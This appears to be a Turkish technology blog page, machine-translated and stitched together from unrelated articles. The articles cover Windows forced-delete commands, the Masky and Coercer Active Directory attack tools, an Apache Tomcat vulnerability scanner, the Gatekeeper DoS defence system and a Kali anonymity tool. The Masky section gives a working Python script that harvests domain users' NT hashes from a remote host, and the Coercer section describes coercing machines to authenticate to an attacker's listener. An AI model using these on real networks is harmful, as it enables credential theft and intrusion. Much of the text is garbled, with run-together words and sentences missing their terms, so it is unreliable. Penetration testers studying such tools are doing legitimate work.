Teknoloji blogu! Türkiye'nin en büyük teknoloji blogu cybersecurityplus.code.blog üzerinden en güncel teknoloji blog, methodları öğren son dakika gelişmeler
Bu yöntem ile sileceğiniz klasörler Geri Dönüşüm Kutusu‘na gitmeden direk olarak silineceği için gerekliyse yedek almayı unutmayın.
Klasörleri silmek için kullanabileceğiniz RD veya RMDIR komutları tamamen aynı işe yarar.
Dosyaları silmek için kullanabileceğiniz DEL veya ERASE komutları tamamen aynı işe yarar.
Bir klasörün silinmemekte ısrar etmesinin sebebi Sistem Klasörü olması olabilir ve bu tip bir klasörü silmek sisteminizin kararlılığını bozabilir. Bu yüzden ne olduğunu bilmediğiniz klasörleri silmeyin.
1- Yönetici haklarına sahip bir Komut İstemcisi veya WinRe konsolunu kullanarak bir Komut İstemcisi açın.
2- Alttaki komutlardan ihtiyacınız olanı (Kırmızı ile yazılan yere silmek istediğiniz klasörün/dosyanın tam adresi gelecek şekilde) yazın ve Enter’a Basın.
RD /S /Q “Klasörün tam adresi”
DEL /F /Q /A “Dosyanın tam adresi”
Örneğin Masüstündeki Nonpasaran klasörünü silmek istersem;
Nonpasaran isimli Metin Belgesi’ni silmek istersem;
DEL /F /Q /A “C:\Users\nonpasaran\Desktop\Nonpasaran.txt”
olacak.
Eğer silmek istediğiniz dosya ise uzantısını da doğru bir şekilde yazmanız gerekiyor. Bunun için herhangi bir Windows Gezgini penceresinde Düzenle/Klasör ve arama seçenekleri yolunu izleyin ve Bilinen dosya türleri için uzantıları gizle seçeneğindeki işareti kaldırın ve kaydedip çıkın.
3- Klasör/Dosya silinmiş olmalı. Silinmediyse adresi kontrol edin. (Klasöre Shift tuşunu basılı tutarken sağ tıklayarak Yol olarak kopyala demek kolaylık sağlayabilir) Silme işlemi tamamlandıktan sonra Komut İstemcisi’ni kapatın.
/F : DEL komutuna zorlama (Force) hakkı veriyor. Yani dosya/klasör sadece okunabilir olsa dahi silinmesini sağlıyor. /Q : Sessiz (Quiet) modda silinmesini sağlıyor. Yani silinme işlemi sizden onay istemeden arka planda gerçekleşiyor. /S : Alt klasörleri de sil. (Subfolders) /A : Dosya/Klasörün Özniteliklerini işleme uygun hale getirmek için izin vermeyi sağlıyor. (Allow) Burada Öznitelikleri de açıklamak istiyorum;
R (Read Only) : Yanlızca okunabilir. S (System) : Sistem H (Hidden) : Gizli A (Archive) : Arşiv
Bu makelemde Komut İstemcisini Kullanarak Bir Klasörü / Dosyayı Silmek anlattım. Bir sonraki makalemimizde görüşmek üzere.. Sorularınızı iletişim bölümünden yazabilirsiniz.
Masky, bir ADCS sayesinde etki alanı kullanıcılarının kimlik bilgilerini uzaktan boşaltmak için alternatif bir yol sağlayan bir python kitaplığıdır . PFX, NT karmaları ve TGT’yi daha geniş bir kapsamda kolayca toplamak için bu kitaplığın üzerine bir komut satırı aracı oluşturulmuştur.
Bu araç, herhangi bir yeni güvenlik açığından yararlanmaz ve LSASS işlem belleğini boşaltarak çalışmaz. Aslında, yalnızca meşru Windows ve Active Directory özelliklerinden yararlanır (belirteç kimliğine bürünme, kerberos aracılığıyla sertifika doğrulama ve PKINIT aracılığıyla NT karmaları alma). Uygulanan teknikleri ve Masky’nin nasıl çalıştığını detaylandırmak için bir blog yazısı yayınlandı.
Masky kaynak kodu büyük ölçüde harika Certify ve Certipy araçlarına dayanmaktadır. ADCS’ye karşı saldırgan istismar teknikleri ile ilgili araştırmalar için yazarlarına gerçekten teşekkür ederim (bkz. Teşekkürler bölümü ).
Kurulum
Masky python3 kitaplığı ve ilişkili CLI’si, genel PyPi deposu aracılığıyla aşağıdaki gibi kolayca kurulabilir:
pip install masky
Masky aracısı yürütülebilir dosyası zaten PyPi paketine dahil edilmiştir.
Ayrıca, aracıyı değiştirmeniz gerekirse, C# kodu içinde bulunan bir Visual Studio projesi aracılığıyla yeniden derlenebilir agent/Masky.sln. İnşa edilmesini gerektirecektir .NET Framework 4.
kullanım
Masky bir Python kütüphanesi olarak tasarlanmıştır. Ayrıca, pentest veya RedTeam aktiviteleri sırasında kullanımını kolaylaştırmak için üzerine bir komut satırı arayüzü oluşturuldu.
CA serverHer iki kullanım için de, önce bir ADCS aracılığıyla CA namedağıtılan a’nın FQDN’sini almanız gerekir . certipy findBu bilgiler, seçenek veya yerleşik Microsoft certutil.exearacı aracılığıyla kolayca alınabilir . UserHedeflenen CA’da varsayılan şablonun etkinleştirildiğinden emin olun .
RasAutoUyarı: Masky, mevcut hizmetin değiştirilmesi yoluyla her hedefe bir yürütülebilir dosya dağıtır . İlk değerinin otomatik olarak geri alınmasına rağmen, ImagePathMasky çalışma zamanı sırasında beklenmeyen bir hata temizleme aşamasını atlayabilir. Bu nedenle, böyle bir istenmeyen duruş durumunda orijinal değeri manuel olarak sıfırlamayı unutmayın.
Komut satırı
Aşağıdaki demo, 4 uzak sistemi hedefleyerek Masky’nin temel kullanımını göstermektedir. Yürütülmesi, sec.lab test etki alanından 3 farklı etki alanı kullanıcısının NT karmalarını, CCACHE ve PFX’lerini toplamaya izin verir.
Masky ayrıca bu tür araçlar tarafından yaygın olarak sağlanan seçenekleri de sağlar (iş parçacığı numarası, kimlik doğrulama modu, dosyalardan yüklenen hedefler vb.).
__ __ _ | \/ | __ _ ___| | ___ _ | |\/| |/ _` / __| |/ / | | | | | | | (_| \__ \ <| | |_|\__,_|___/_|\_\__, | v0.0.3 |___/usage: Masky [-h] [-v] [-ts] [-t THREADS] [-d DOMAIN] [-u USER] [-p PASSWORD] [-k] [-H HASHES] [-dc-ip ip address] -ca CERTIFICATE_AUTHORITY [-nh] [-nt] [-np] [-o OUTPUT] [targets ...]positional arguments: targets Targets in CIDR, hostname and IP formats are accepted, from a file or notoptions: -h, --help show this help message and exit -v, --verbose Enable debugging messages -ts, --timestamps Display timestamps for each log -t THREADS, --threads THREADS Threadpool size (max 15)Authentication: -d DOMAIN, --domain DOMAIN Domain name to authenticate to -u USER, --user USER Username to au thenticate with -p PASSWORD, --password PASSWORD Password to authenticate with -k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. -H HASHES, --hashes HASHES Hashes to authenticate with (LM:NT, :NT or :LM)Connection: -dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -ca CERTIFICATE_AUTHORITY, --certificate-authority CERTIFICATE_AUTHORITY Certificate Authority Name (SERVER\CA_NAME)Results: -nh, --no-hash Do not request NT hashes -nt, --no-ccache Do not save ccache files -np, --no-pfx Do not save pfx files -o OUTPUT, --output OUTPUT Local path to a folder where Masky results will be stored (automatically creates the folde r if it does not exit)
Python kitaplığı
Aşağıda, uzak bir hedeften çalışan etki alanı kullanıcı oturumlarının sırlarını toplamak için Masky kitaplığını kullanan basit bir komut dosyası verilmiştir.
from masky import Maskyfrom getpass import getpassdef dump_nt_hashes(): # Define the authentication parameters ca = "srv-01.sec.lab\sec-SRV-01-CA" dc_ip = "192.168.23.148" domain = "sec.lab" user = "askywalker" password = getpass() # Create a Masky instance with these credentials m = Masky(ca=ca, user=user, dc_ip=dc_ip, domain=domain, password=password) # Set a target and run Masky against it target = "192.168.23.130" rslts = m.run(target) # Check if Masky succesfully hijacked at least a user session # or if an unexpected error occured if not rslts: return False # Loop on MaskyResult object to display hijacked users and to retreive their NT hashes print(f"Results from hostname: {rslts.hostname}") for user in rslts.users: print(f"\t - {user.domain}\{user.n ame} - {user.nt_hash}") return Trueif __name__ == "__main__": dump_nt_hashes()
/manager/htmlErişim ve varsayılan kimlik bilgileri için testler .
--list-cvesSeçenek ile her sürümün CVE’lerini listeleyin
Kurulum
Şimdi bu komutla pypi’den yükleyebilirsiniz:
sudo python3 -m pip install apachetomcatscanner
kullanım
$ ./ApacheTomcatScanner.py -hApache Tomcat Scanner v2.3.2 - by @podalirius_usage: ApacheTomcatScanner.py [-h] [-v] [--debug] [-C] [-T THREADS] [-s] [--only-http] [--only-https] [--no-check-certificate] [--xlsx XLSX] [--json JSON] [-PI PROXY_IP] [-PP PROXY_PORT] [-rt REQUEST_TIMEOUT] [-tf TARGETS_FILE] [-tt TARGET] [-tp TARGET_PORTS] [-ad AUTH_DOMAIN] [-ai AUTH_DC_IP] [-au AUTH_USER] [-ap AUTH_PASSWORD] [-ah AUTH_HASH]A python script to scan for Apache Tomcat server vulnerabilities.optional arguments: -h, --help show this help message and exit -v, --verbose Verbose mode. (default: False) --debug Debug mode, for huge verbosity. (default: False) -C, --list-cves List CVE ids affecting each version found. (default: False) -T THREADS, --threads THREADS Number of threads (default: 5) -s, --servers-only If querying ActiveDirectory, only get servers and not all computer objects. (default: False) --only-http Scan only with HTTP scheme. (default: False, scanning with both HTTP and HTTPs) --only-https Scan only with HTTPs scheme. (default: False, scanning with both HTTP and HTTPs) --no-check-certificate Do not check certificate. (default: False) --xlsx XLSX Export results to XLSX --json JSON Export results to JSON -PI PROXY_IP, --proxy-ip PROXY_IP Proxy IP. -PP PROXY_PORT, --proxy-port PROXY_PORT Proxy port -rt REQUEST_TIMEOUT, --request-timeout REQUEST_TIMEOUT -tf TARGETS_FILE, --targets-file TARGETS_FILE Path to file containing a line by line list of targets. -tt TARGET, --target TARGET Target IP, FQDN or CIDR -tp TARGET_PORTS, --target-ports TARGET_PORTS Target ports to scan top search for Apache Tomcat servers. -ad AUTH_DOMAIN, --auth-domain AUTH_DOMAIN Windows domain to authenticate to. -ai AUTH_DC_IP, --auth-dc-ip AUTH_DC_IP IP of the domain controller. -au AUTH_USER, --auth-user AUTH_USER Username of the domain account. -ap AUTH_PASSWORD, --auth-password AUTH_PASSWORD Password of the domain account. -ah AUTH_HASH, --auth-hash AUTH_HASH LM:NT hashes to pass the hash for this user.
Örnek
Ayrıca, her sürümün CVE’lerini şu --list-cvesseçenekle listeleyebilirsiniz:
Bir dosyadan bir hedef listesine zorlama saldırısı gerçekleştirin.--targets-file
--webdav-hostve ile bir WebDAV hedefine zorlama--webdav-port
kullanım
$ ./Coercer.py -h ______ / ____/___ ___ _____________ _____ / / / __ \/ _ \/ ___/ ___/ _ \/ ___/ / /___/ /_/ / __/ / / /__/ __/ / v1.6 \____/\____/\___/_/ \___/\___/_/ by @podalirius_usage: Coercer.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [--hashes [LMHASH]:NTHASH] [--no-pass] [-v] [-a] [-k] [--dc-ip ip address] [-l LISTENER] [-wh WEBDAV_HOST] [-wp WEBDAV_PORT] (-t TARGET | -f TARGETS_FILE) [--target-ip ip address]Automatic windows authentication coercer over various RPC calls.options: -h, --help show this help message and exit -u USERNAME, --username USERNAME Username to authenticate to the endpoint. -p PASSWORD, --password PASSWORD Password to authenticate to the endpoint. (if omitted, it will be asked unless -no-pass is specified) -d DOMAIN, --domain DOMAIN Windows domain name to authenticate to the endpoint. --hashes [LMHASH]:NTHASH NT/LM hashes (LM hash can be empty) --no-pass Don't ask for password (useful for -k) -v, --verbose Verbose mode (default: False) -a, --analyze Analyze mode (default: Attack mode) -k, --kerberos Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line --dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter -t TARGET, --target TARGET IP address or hostname of the target machine -f TARGETS_FILE, --targets-file TARGETS_FILE IP address or hostname of the target machine --target-ip ip address IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it -l LISTENER, --listener LISTENER IP address or hostname of the listener machine -wh WEBDAV_HOST, --webdav-host WEBDAV_HOST WebDAV IP of the server to authenticate to. -wp WEBDAV_PORT, --webdav-port WEBDAV_PORT WebDAV port of the server to authenticate to.
Örnek çıktı
Saldırı modunda ( --analyzeseçeneksiz) aşağıdaki çıktıyı alırsınız:
Tüm RPC çağrılarından sonra, Responder’da çok sayıda kimlik doğrulaması alırsınız:
Katkı
Çekme istekleri kabul edilir. Başka özellikler eklemek istiyorsanız bir konu açmaktan çekinmeyin.
Gatekeeper, ilk açık kaynaklı DoS koruma sistemidir. Herhangi bir en yüksek bant genişliğine ölçeklendirilmek üzere tasarlanmıştır, böylece hem bugünün hem de yarının DoS saldırılarına dayanabilir. Gatekeeper’ın coğrafi olarak dağıtılmış mimarisine rağmen, gelen trafik üzerinde uygulanması gereken tüm kararları tanımlayan ağ politikası merkezileştirilmiştir. Bu merkezileştirilmiş politika, ağ operatörlerinin çok yüksek gecikme süresi (örneğin dağıtılmış veri tabanları) altında geçerli olmayacak dağıtılmış algoritmalardan yararlanmasına ve aynı anda birden çok çok vektörlü DoS saldırısıyla mücadele etmesine olanak tanır.
Gatekeeper’ın hedef kullanıcıları, kurumların, hizmet ve içerik sağlayıcıların, kurumsal ağların vb. ağ operatörleridir. Bireysel İnternet kullanıcıları tarafından kullanılması amaçlanmamıştır.
Daha fazla bilgi için Gatekeeper wiki’sine bakın . Hugepages Yapılandırması Nasıl Kurulur
DPDK, büyük sayfaların kullanılmasını gerektirir; dev sayfaların montajına ilişkin talimatlar gereksinim belgelerinde mevcuttur . Birçok sistemde aşağıdaki büyük sayfalar kurulumu yeterlidir:
$ echo 256 | sudo tee /sys/kernel/mm/hugepages/hugepages-2048kB/nr_hugepages
Seçenek 1: Paketleri Alın
Gatekeeper için Debian paketleri projenin Yayınlar sayfasında mevcuttur. Düzenlemek
Paketler indirildikten sonra aşağıdaki komutlarla yüklenebilirler:
Paket gatekeeper-dpdk-dev, paket kurulumu ve çekirdek yükseltmeleri sırasında ilgili çekirdek modüllerini oluşturan DKMS paketlerinin bir bağımlılığıdır. Ağ Bağdaştırıcılarını Yapılandırma
Dosyayı düzenleyin /etc/gatekeeper/envvarsve DPDK’ya bağlanacak ağ bağdaştırıcılarının adlarını girin. Örneğin:
GATEKEEPER_INTERFACES="eth0 eth1"
Alternatif olarak, arabirimlerin PCI adresleri belirtilebilir:
Not: Derlemek ve çalıştırmak için hem libmnl0ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . Derlemek ve çalıştırmak için hem ve hem de gereklidir , ancak yalnızca yalnızca çalıştırmak için gereklidir . en son DPDK’yı derlemek ve NUMA sistemlerini desteklemek için gereklidir. Paket , DPDK’yı ELF dosyalarından BPF programlarını okuma desteğiyle derlemek için gereklidir, ancak yalnızca onu çalıştırmak için gereklidir. Paket , klasördeki BPF programlarını derlemek için gereklidir . , , , ve paketleri BIRD içindir . Paket , Gatekeeper Debian paketleri oluşturmak için kullanılır .libmnl-devgatekeeperlibmnl0gatekeeperlibkmod2libkmod-devgatekeeperlibkmod2gatekeeperlibnuma-devlibelf-devlibelf1libc6-dev-i386bpf/autoconfflexbisonlibncurses5-devlibreadline-devdevscripts
DPDK’yı kullanmak için tüm çevresel gereksinimlere sahip olduğunuzdan emin olun . Klon Deposu
Gatekeeper bağımlılıklarını içeren alt modüller dahil olmak üzere Gatekeeper deposunu klonlayın:
Klon seçeneğini kullanmazsanız , bağımlılıkları içeren alt modülleri dizin --recursiveiçinden almanız gerekir :gatekeeper
$ git submodule init$ git submodule update
derlemek
Bu bölüm Gatekeeper’ın manuel olarak nasıl oluşturulacağını açıklar. Debian paketleri oluşturmak istiyorsanız, Paketler nasıl oluşturulur bölümüne bakın .
Bu komut dosyası DPDK, LuaJIT ve BIRD’yi derler ve gerekli çekirdek modüllerini yükler. Ayrıca, arabirim adlarını ve ilgili PCI adreslerini dosyaya kaydeder, lua/if_map.luaböylece arabirim adları Gatekeeper yapılandırma dosyalarında kullanılabilir.
Ayrıca iki çevresel değişken belirler: RTE_SDKve RTE_TARGET. Derlemeden önce ayarlanmaları gerekir gatekeeper.
Kurulum komut dosyasını çalıştırdıktan sonra, çevresel değişkenleri kabuğunuzun tercihler dosyasına kaydetmek isteyebilirsiniz. Örneğin, Bash’de şunları yapabilirsiniz:
Ağ bağdaştırıcılarının kullanılmadan önce gatekeeperDPDK’ya bağlanması gerekir. Bunun için scripti kullanabilirsiniz dependencies/dpdk/usertools/dpdk-devbind.py. Örneğin:
enp131s0f0Bu komut, arabirimi sürücüye bağlar, uio_pci_genericböylece çerçeveler çekirdek yerine doğrudan DPDK’ya iletilebilir. Bu bağlamanın yukarıdaki adımlarda Gatekeeper ayarlandıktan sonra gerçekleşmesi gerektiğini unutmayın, böylece bağlı arabirim lua/if_map.lua. Nasıl Çalıştırılır
Derlendikten gatekeeperve ortam doğru şekilde yapılandırıldıktan sonra şunu çalıştırın:
Nerede [EAL OPTIONS]çift çizgiden önce belirtilir ve DPDK’nın Çevresel Soyutlama Katmanı için parametreleri temsil eder ve [GATEKEEPER OPTIONS]çift çizgiden sonra belirtilir ve Gatekeeper’a özgü seçenekleri temsil eder .
DPDK’daki cihaz ve bellek yapılandırması dahil olmak üzere sistemin erken yapılandırması stdout’a kaydedilecektir. Gatekeeper başlatıldığında, tüm bilgiler Gatekeeper günlüğüne gönderilir. Paketler nasıl oluşturulur
Gatekeeper Debian paketleri aşağıdaki komutlarla oluşturulabilir. Depo kökünden çalıştırılmaları amaçlanmıştır ve git alt modüllerinin çekildiğini ve yukarıda belirtildiği gibi yapı bağımlılıklarının kurulduğunu varsayarlar. Gatekeeper ve alt modüller, paket oluşturma işlemi sırasında otomatik olarak derlenecektir.
Whoami aracının amacı, sizi Kali linux üzerinde mümkün olduğunca anonim kılar . Kullanım kolaylığı ve basit arayüzü ile kullanıcı dostudur . Mümkün olan en yüksek anonimlik seviyesini sağlamak için iki farklı yol izler.
Son olarak, internette asla yüzde yüz güvenlik olmadığını unutmayın!
Özellikler
anti mitm
Günlük katili
IP değiştirici
DNS değiştirici
Mac değiştirici
Anti soğuk çizme
saat dilimi değiştirici
ana bilgisayar adı değiştirici
Tarayıcı anonimleştirme
Başlarken
Sisteminizi düzenli olarak güncellemezseniz veya bu paketleri sisteminize yüklemediyseniz aracı kullanamazsınız. Öyleyse kurulumdan önce neye ihtiyacımız olduğunu ve nasıl indirebileceğimizi görelim.
Tüm bağımlılıkları aşağıdaki komutla indirebilir veya güncel olup olmadığını kontrol edebilirsiniz.tor curl python3 python3-scapy ağ yöneticisi “>sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager
İşte bu kadar, artık aleti çalıştırmaya hazırsınız! kullanım
Kurulumu tamamladıktan sonra, arama menüsüne “Kali Whoami” yazarak veya bir terminalde “sudo kali-whoami –help” yazarak uygulamayı çalıştırın.olası bir hata durumunda sistemi onarın. –help : Bu, menüyü gösterir. “>
[+] Usage : sudo kali-whoami [option]--start : It will make backups and start the program.--stop : Closes the program using a backup.--status : Provides information about working status.--fix : Used to repair the system in case of a possible bug.--help : This shows the menu.